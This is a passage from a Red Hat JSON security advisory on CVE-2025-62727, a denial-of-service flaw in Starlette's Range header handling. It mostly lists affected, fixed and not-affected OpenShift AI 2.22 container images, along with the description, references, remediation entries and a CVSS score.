"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2406929"
}
],
"notes": [
{
"category": "description",
"text": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "starlette: Starlette DoS via Range header merging",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "RHBZ#2406929",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406929"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5",
"url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
}
],
"release_date": "2025-10-28T20:14:53.655000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
